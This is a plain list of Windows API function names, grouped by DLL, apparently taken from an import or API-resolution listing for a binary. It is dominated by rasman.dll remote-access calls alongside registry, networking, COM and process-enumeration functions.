- rasman.dll.RasPortSetFramingEx
- rasman.dll.RasSetCachedCredentials
- rasman.dll.RasGetDialParams
- rasman.dll.RasSetDialParams
- rasman.dll.RasCreateConnection
- rasman.dll.RasDestroyConnection
- rasman.dll.RasConnectionEnum
- rasman.dll.RasAddConnectionPort
- rasman.dll.RasEnumConnectionPorts
- rasman.dll.RasGetConnectionParams
- rasman.dll.RasSetConnectionParams
- rasman.dll.RasGetConnectionUserData
- rasman.dll.RasSetConnectionUserData
- rasman.dll.RasGetPortUserData
- rasman.dll.RasSetPortUserData
- rasman.dll.RasAddNotification
- rasman.dll.RasSignalNewConnection
- rasman.dll.RasApplyPostConnectActions
- rasman.dll.RasProtocolStop
- rasman.dll.RasProtocolCallback
- rasman.dll.RasProtocolChangePassword
- rasman.dll.RasProtocolGetInfo
- rasman.dll.RasProtocolRetry
- rasman.dll.RasProtocolStart
- rasman.dll.RasPortOpen
- rasman.dll.RasAllocateRoute
- rasman.dll.RasActivateRoute
- rasman.dll.RasActivateRouteEx
- rasman.dll.RasDeviceSetInfo
- rasman.dll.RasDeviceSetInfoSafe
- rasman.dll.RasDeviceConnect
- rasman.dll.RasPortSetInfo
- rasman.dll.RasSendProtocolResultToRasman
- rasman.dll.RasSetEapInfo
- rasman.dll.RasRpcConnect
- rasman.dll.RasRpcDisconnect
- rasman.dll.RasGetNumPortOpen
- rasman.dll.RasRefConnection
- rasman.dll.RasSetEapUIData
- rasman.dll.RasGetEapUIData
- rasman.dll.RasFindPrerequisiteEntry
- rasman.dll.RasPortOpenEx
- rasman.dll.RasLinkGetStatistics
- rasman.dll.RasConnectionGetStatistics
- rasman.dll.RasGetHportFromConnection
- rasman.dll.RasRPCBind
- rasman.dll.RasReferenceCustomCount
- rasman.dll.RasGetHConnFromEntry
- rasman.dll.RasGetDeviceName
- rasman.dll.RasEnableIpSec
- rasman.dll.RasSetTunnelEndPoints
- rasman.dll.RasStartRasAutoIfRequired
- rasman.dll.RasStartProtocolRenegotiation
- rasman.dll.RasSendNotification
- rasman.dll.RasGetDeviceNameW
- rasman.dll.RasGetUnicodeDeviceName
- rasman.dll.RasRpcGetVersion
- rasman.dll.RasRpcPortEnum
- rasman.dll.RasRpcDeviceEnum
- rasman.dll.RasRpcGetDevConfig
- rasman.dll.RasRpcPortGetInfo
- rasman.dll.RasRpcGetInstalledProtocols
- rasman.dll.RasRpcGetInstalledProtocolsEx
- rasman.dll.RasRpcGetSystemDirectory
- rasman.dll.RasRpcGetUserPreferences
- rasman.dll.RasRpcDeleteEntry
- rasman.dll.RasRpcEnumConnections
- rasman.dll.RasRpcGetCountryInfo
- rasman.dll.RasRpcGetErrorString
- rasman.dll.RasRpcSetUserPreferences
- rasman.dll.RasProtocolUpdateConnection
- rasman.dll.RasAddNotificationEx
- rasman.dll.RasRemoveNotificationEx
- rasman.dll.RasGetNotificationEntry
- rasman.dll.RasSignalMonitorThreadExit
- rasman.dll.RasmanUninitialize
- rtutils.dll.TraceRegisterExA
- rtutils.dll.TracePrintfExA
- sechost.dll.OpenSCManagerA
- sechost.dll.OpenServiceA
- sechost.dll.NotifyServiceStatusChangeA
- ole32.dll.CoInitializeEx
- advapi32.dll.RegDeleteTreeA
- advapi32.dll.RegDeleteTreeW
- napinsp.dll.NSPStartup
- sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
- pnrpnsp.dll.NSPStartup
- mswsock.dll.NSPStartup
- winrnr.dll.NSPStartup
- ws2_32.dll.#112
- ws2_32.dll.#111
- dnsapi.dll.DnsApiAlloc
- dnsapi.dll.DnsApiFree
- ole32.dll.CoCreateInstance
- wininet.dll.InternetReadFile
- wininet.dll.HttpQueryInfoA
- ole32.dll.CoTaskMemAlloc
- oleaut32.dll.#8
- oleaut32.dll.#9
- oleaut32.dll.DllGetClassObject
- oleaut32.dll.DllCanUnloadNow
- advapi32.dll.RegOpenKeyW
- ole32.dll.CoTaskMemFree
- ole32.dll.StringFromIID
- iphlpapi.dll.GetAdaptersAddresses
- dhcpcsvc.dll.DhcpRequestParams
- iphlpapi.dll.ConvertInterfaceGuidToLuid
- kernel32.dll.GetVersion
- kernel32.dll.GlobalSize
- rasapi32.dll.RasEnumEntriesA
- kernel32.dll.CreateToolhelp32Snapshot
- kernel32.dll.Process32First
- kernel32.dll.Process32Next
- oleaut32.dll.#2
- oleaut32.dll.#6